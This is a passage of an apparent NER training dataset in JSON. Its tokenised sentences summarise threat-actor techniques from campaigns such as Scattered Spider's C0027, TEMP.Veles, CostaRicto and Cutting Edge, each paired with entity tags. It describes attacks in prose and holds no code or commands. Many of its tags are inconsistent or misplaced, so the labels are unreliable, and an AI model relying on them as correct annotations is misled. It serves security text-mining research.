"identify", "privileged", "users,", "along", "with", "the", "email", "addresses", "and", "AD", "attributes." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Features", "O", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "leveraged", "compromised", "credentials", "from", "victim", "users", "to", "authenticate", "to", "Azure", "tenants." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "accessed", "Azure", "AD", "to", "download", "bulk", "lists", "of", "group", "members", "and", "their", "Active", "Directory", "attributes." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Features", "B-Exp", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "compromised", "Azure", "credentials", "for", "credential", "theft", "activity", "and", "lateral", "movement", "to", "on-premises", "systems." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "I-Way", "O", "B-Way", "O", "B-SamFile", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "access", "to", "the", "victim's", "Azure", "tenant", "to", "create", "Azure", "VMs." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "sent", "phishing", "messages", "via", "SMS", "to", "steal", "credentials." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Way", "I-Way", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "performed", "domain", "replication." ], "ner_tags": [ "O", "B-Features", "B-Idus", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "accessed", "victim", "OneDrive", "environments", "to", "search", "for", "VPN", "and", "MFA", "enrollment", "information,", "help", "desk", "instructions,", "and", "new", "hire", "guides." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "registered", "devices", "for", "MFA", "to", "maintain", "persistence", "through", "victims'", "VPN." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "accessed", "Azure", "AD", "to", "identify", "email", "addresses." ], "ner_tags": [ "O", "B-Features", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "exploited", "CVE-2021-35464", "in", "the", "ForgeRock", "Open", "Access", "Management", "(OpenAM)", "application", "server", "to", "gain", "initial", "access." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Features", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "Citrix", "and", "VPNs", "to", "persist", "in", "compromised", "environments." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "impersonated", "legitimate", "IT", "personnel", "in", "phone", "calls", "and", "text", "messages", "either", "to", "direct", "victims", "to", "a", "credential", "harvesting", "site", "or", "getting", "victims", "to", "run", "commercial", "remote", "monitoring", "and", "management", "(RMM)", "tools." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "I-Org", "I-Org", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "downloaded", "tools", "using", "victim", "organization", "systems." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Area", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "attempted", "to", "gain", "access", "by", "continuously", "sending", "MFA", "messages", "to", "the", "victim", "until", "they", "accept", "the", "MFA", "push", "challenge." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "used", "RustScan", "to", "scan", "for", "open", "ports", "on", "targeted", "ESXi", "appliances." ], "ner_tags": [ "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "SSH", "tunneling", "in", "targeted", "environments." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "installed", "the", "open-source", "rsocx", "reverse", "proxy", "tool", "on", "a", "targeted", "ESXi", "appliance." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "directed", "victims", "to", "run", "remote", "monitoring", "and", "management", "(RMM)", "tools." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "accessed", "victim", "SharePoint", "environments", "to", "search", "for", "VPN", "and", "MFA", "enrollment", "information,", "help", "desk", "instructions,", "and", "new", "hire", "guides." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "sent", "Telegram", "messages", "impersonating", "IT", "personnel", "to", "harvest", "credentials." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "B-Way", "I-Way", "O", "I-Org", "I-Org", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "phone", "calls", "to", "instruct", "victims", "to", "navigate", "to", "credential-harvesting", "websites." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "I-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "impersonated", "legitimate", "IT", "personnel", "in", "phone", "calls", "to", "direct", "victims", "to", "download", "a", "remote", "monitoring", "and", "management", "(RMM)", "tool", "that", "would", "allow", "the", "adversary", "to", "remotely", "control", "their", "system." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "I-Org", "I-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "obtained", "and", "used", "multiple", "tools", "including", "the", "LINpeas", "privilege", "escalation", "utility,", "aws_consoler,", "rsocx", "reverse", "proxy,", "Level", "RMM", "tool,", "and", "RustScan", "port", "scanner." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "B-Way", "B-Way", "I-Tool", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "downloaded", "tools", "from", "sites", "including", "file.io,", "GitHub,", "and", "paste.ee." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "C0027,", "Scattered", "Spider", "used", "Windows", "Management", "Instrumentation", "(WMI)", "to", "move", "laterally", "via", "Impacket." ], "ner_tags": [ "O", "B-Idus", "B-Idus", "B-HackOrg", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "VPN", "access", "to", "persist", "in", "the", "victim", "environment." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "B-Tool", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "routinely", "deleted", "tools,", "logs,", "and", "other", "files", "after", "they", "were", "finished", "with", "them." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "modified", "and", "added", "entries", "within", "<code>HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows", "NT\\CurrentVersion\\Image", "File", "Execution", "Options</code>", "to", "maintain", "persistence." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "Mimikatz", "and", "a", "custom", "tool,", "SecHack,", "to", "harvest", "credentials." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "B-Way", "O", "O", "I-Tool", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "staging", "folders", "that", "are", "infrequently", "used", "by", "legitimate", "users", "or", "processes", "to", "store", "data", "for", "exfiltration", "and", "tool", "deployment." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "renamed", "files", "to", "look", "like", "legitimate", "files,", "such", "as", "Windows", "update", "files", "or", "Schneider", "Electric", "application", "files." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "port-protocol", "mismatches", "on", "ports", "such", "as", "443,", "4444,", "8531,", "and", "50501", "during", "C2." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "PowerShell", "to", "perform", "timestomping." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "encrypted", "SSH-based", "PLINK", "tunnels", "to", "transfer", "tools", "and", "enable", "RDP", "connections", "throughout", "the", "environment." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "B-Tool", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "utilized", "RDP", "throughout", "an", "operation." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "relied", "on", "encrypted", "SSH-based", "tunnels", "to", "transfer", "tools", "and", "for", "remote", "command/program", "execution." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "scheduled", "task", "XML", "triggers." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "timestomping", "to", "modify", "the", "<code>$STANDARD_INFORMATION</code>", "attribute", "on", "tools." ], "ner_tags": [ "O", "O", "B-Org", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "obtained", "and", "used", "tools", "such", "as", "Mimikatz", "and", "PsExec." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "compromised", "VPN", "accounts." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "O", "B-Tool", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "used", "Virtual", "Private", "Server", "(VPS)", "infrastructure." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O" ] }, { "tokens": [ "During", "the", "C0032", "campaign,", "TEMP.Veles", "planted", "Web", "shells", "on", "Outlook", "Exchange", "servers." ], "ner_tags": [ "O", "O", "B-Org", "B-OffAct", "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "collected", "data", "and", "files", "from", "compromised", "networks." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "CostaRicto,", "the", "threat", "actors", "established", "domains,", "some", "of", "which", "appeared", "to", "spoof", "legitimate", "domains." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "set", "up", "remote", "tunneling", "using", "an", "SSH", "tool", "to", "maintain", "access", "to", "a", "compromised", "environment." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "downloaded", "malware", "and", "tools", "onto", "a", "compromised", "host." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "For", "CostaRicto,", "the", "threat", "actors", "used", "custom", "malware,", "including", "PS1,", "CostaBricks,", "and", "SombRAT." ], "ner_tags": [ "O", "B-Way", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "used", "a", "layer", "of", "proxies", "to", "manage", "C2", "communications." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "employed", "nmap", "and", "pscan", "to", "scan", "target", "environments." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "set", "up", "remote", "SSH", "tunneling", "into", "the", "victim's", "environment", "from", "a", "malicious", "domain." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "used", "scheduled", "tasks", "to", "download", "backdoor", "tools." ], "ner_tags": [ "O", "B-Way", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "CostaRicto,", "the", "threat", "actors", "obtained", "open", "source", "tools", "to", "use", "in", "their", "operations." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "saved", "collected", "data", "to", "a", "tar", "archive." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "Perl", "scripts", "to", "enable", "the", "deployment", "of", "the", "THINSPOOL", "shell", "script", "dropper", "and", "for", "enumerating", "host", "data." ], "ner_tags": [ "O", "B-Idus", "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "trojanized", "legitimate", "files", "in", "Ivanti", "Connect", "Secure", "appliances", "with", "malicious", "code." ], "ner_tags": [ "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "DNS", "to", "tunnel", "IPv4", "C2", "traffic." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "stole", "the", "running", "configuration", "and", "cache", "data", "from", "targeted", "Ivanti", "Connect", "Secure", "VPNs." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "disabled", "logging", "and", "modified", "the", "`compcheckresult.cgi`", "component", "to", "edit", "the", "Ivanti", "Connect", "Secure", "built-in", "Integrity", "Checker", "exclusion", "list", "to", "evade", "detection." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "compromised", "VPN", "accounts", "for", "lateral", "movement", "on", "targeted", "networks." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "I-HackOrg", "I-HackOrg", "O", "I-Tool", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "a", "Base64-encoded", "Python", "script", "to", "write", "a", "patched", "version", "of", "the", "Ivanti", "Connect", "Secure", "`dsls`", "binary." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "exploited", "CVE-2023-46805", "and", "CVE-2024-21887", "in", "Ivanti", "Connect", "Secure", "VPN", "appliances", "to", "enable", "authentication", "bypass", "and", "command", "injection.", "A", "server-side", "request", "forgery", "(SSRF)", "vulnerability,", "CVE-2024-21893,", "was", "identified", "later", "and", "used", "to", "bypass", "mitigations", "for", "the", "initial", "two", "vulnerabilities", "by", "chaining", "with", "CVE-2024-21887." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "deleted", "`/tmp/test1.txt`", "on", "compromised", "Ivanti", "Connect", "Secure", "VPNs", "which", "was", "used", "to", "hold", "stolen", "configuration", "and", "cache", "files." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "I-Features", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "cleared", "logs", "to", "remove", "traces", "of", "their", "activity", "and", "restored", "compromised", "systems", "to", "a", "clean", "state", "to", "bypass", "manufacturer", "mitigations", "for", "CVE-2023-46805", "and", "CVE-2024-21887." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "leveraged", "exploits", "to", "download", "remote", "files", "to", "Ivanti", "Connect", "Secure", "VPNs." ], "ner_tags": [ "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "modified", "a", "JavaScript", "file", "on", "the", "Web", "SSL", "VPN", "component", "of", "Ivanti", "Connect", "Secure", "devices", "to", "keylog", "credentials." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "Task", "Manager", "to", "dump", "LSASS", "memory", "from", "Windows", "devices", "to", "disk." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "accessed", "and", "mounted", "virtual", "hard", "disk", "backups", "to", "extract", "ntds.dit." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "compromised", "and", "out-of-support", "Cyberoam", "VPN", "appliances", "for", "C2." ], "ner_tags": [ "O", "B-Org", "B-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "the", "Unix", "socket", "and", "a", "reverse", "TCP", "shell", "for", "C2", "communications." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "malicious", "SparkGateway", "plugins", "to", "inject", "shared", "objects", "into", "web", "process", "memory", "on", "compromised", "Ivanti", "Secure", "Connect", "VPNs", "to", "enable", "deployment", "of", "backdoors." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "Iodine", "to", "tunnel", "IPv4", "traffic", "over", "DNS." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "a", "Python", "reverse", "shell", "and", "the", "PySoxy", "SOCKS5", "proxy", "tool." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "RDP", "with", "compromised", "credentials", "for", "lateral", "movement." ], "ner_tags": [ "O", "B-Org", "B-HackOrg", "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "moved", "laterally", "using", "compromised", "credentials", "to", "connect", "to", "internal", "Windows", "systems", "with", "SMB." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "SSH", "for", "lateral", "movement." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "peformed", "reconnaissance", "of", "victims'", "internal", "websites", "via", "proxied", "connections." ], "ner_tags": [ "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "the", "ENUM4LINUX", "Perl", "script", "for", "discovery", "on", "Windows", "and", "Samba", "hosts." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "changed", "timestamps", "of", "multiple", "files", "on", "compromised", "Ivanti", "Secure", "Connect", "VPNs", "to", "conceal", "malicious", "activity." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "leveraged", "tools", "including", "Interactsh", "to", "identify", "vulnerable", "targets,", "PySoxy", "to", "simultaneously", "dispatch", "traffic", "between", "multiple", "endpoints,", "BusyBox", "to", "enable", "post", "exploitation", "activities,", "and", "Kubo", "Injector", "to", "inject", "shared", "objects", "into", "process", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O", "O", "B-Purp", "B-Features", "O", "O", "O", "B-Way", "O", "O", "I-OffAct", "I-OffAct", "O", "O", "B-Way", "B-Tool", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "sent", "a", "magic", "48-byte", "sequence", "to", "enable", "the", "PITSOCK", "backdoor", "to", "communicate", "via", "the", "`/tmp/clientsDownload.sock`", "socket." ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "the", "publicly", "available", "Interactsh", "tool", "to", "identify", "Ivanti", "Connect", "Secure", "VPNs", "vulnerable", "to", "CVE-2024-21893." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "modified", "the", "JavaScript", "loaded", "by", "the", "Ivanti", "Connect", "Secure", "login", "page", "to", "capture", "credentials", "entered." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Cutting", "Edge,", "threat", "actors", "used", "multiple", "web", "shells", "to", "maintain", "presence", "on", "compromised", "Connect", "Secure", "appliances", "such", "as", "WIREFIRE,", "GLASSTOKEN,", "BUSHWALK,", "LIGHTWIRE,", "and", "FRAMESTING." ], "ner_tags": [ "O", "B-Org", "B-HackOrg", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "Empire", "to", "automatically", "gather", "the", "username,", "domain", "name,", "machine", "name,", "and", "other", "system", "information." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "collected", "information", "via", "Empire,", "which", "was", "automatically", "sent", "back", "to", "the", "adversary's", "C2." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "ran", "encoded", "commands", "from", "the", "command", "line." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "used", "Empire", "to", "gather", "various", "local", "system", "information." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "B-Features", "B-Purp" ] }, { "tokens": [ "During", "Frankenstein,", "the", "threat", "actors", "deobfuscated", "Base64-encoded", "commands", "following", "the", "execution", 